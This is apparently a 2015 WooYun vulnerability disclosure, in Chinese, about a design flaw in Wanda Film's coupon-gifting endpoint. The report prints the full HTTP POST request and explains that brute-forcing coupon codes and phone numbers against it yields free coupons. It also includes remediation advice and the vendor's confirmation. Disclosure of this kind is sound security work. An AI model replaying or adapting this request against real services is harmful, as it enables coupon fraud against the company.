当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118168

漏洞标题:万达电影电影票设计缺陷导致可免费赠送给好友兑换券

相关厂商:大连万达集团股份有限公司

漏洞作者: Mr.leo

提交时间:2015-06-04 11:35

修复时间:2015-07-19 13:58

公开时间:2015-07-19 13:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认,细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开

简要描述:

万达电影电影票设计缺陷导致可免费赠送给好友兑换券

详细说明:

WooYun: 万达电影电影票设计缺陷可抢他人优惠卷 前人经验
看来下另外一个站点,wwwdemo.wandafilm.com 此站从域名来看是演示系统,实则与生产系统一致同步。
问题出现在我的优惠,将已经存在的1张兑换券赠送给好友,该接口没有对兑换码生成的次数进行限制,导致可以批量免费赠送兑换券给好友(需要是万达注册用户)

3.png


POST http://wwwdemo.wandafilm.com//user/myCoupons.do?m=giveCoupons HTTP/1.1
Host: wwwdemo.wandafilm.com
Proxy-Connection: keep-alive
Content-Length: 70
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://wwwdemo.wandafilm.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://wwwdemo.wandafilm.com/user/myCoupons.do?m=init
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: __utma=81395784.xxxxxxxx.1428550560.2; __utmz=81395784.1428050786.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=E7A1FAxxxxxx8B1AB94BF76; jsessionid|JSESSIONID=f34038b99ba860a02472d8fba4c58d22; Hm_lvt_xxxxxxx=1433383826
Connection: close
couponsNo=759073521154xxxxxx&mobileNo=152xxxxxxx&couponsType=coupons


以上接口只要指定爆破的兑换码和手机号码即可

1.png


通过http返回值和字段大小判断是否赠送成功

2.png


免费赠送成功

5.png

漏洞证明:

已经证明

修复方案:

1、与主站系统隔离
2、限制获取兑换码的次数

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-04 13:56

厂商回复:

感谢同学的关注与贡献!测试系统缺陷,马上通知业务整改。

最新状态:

暂无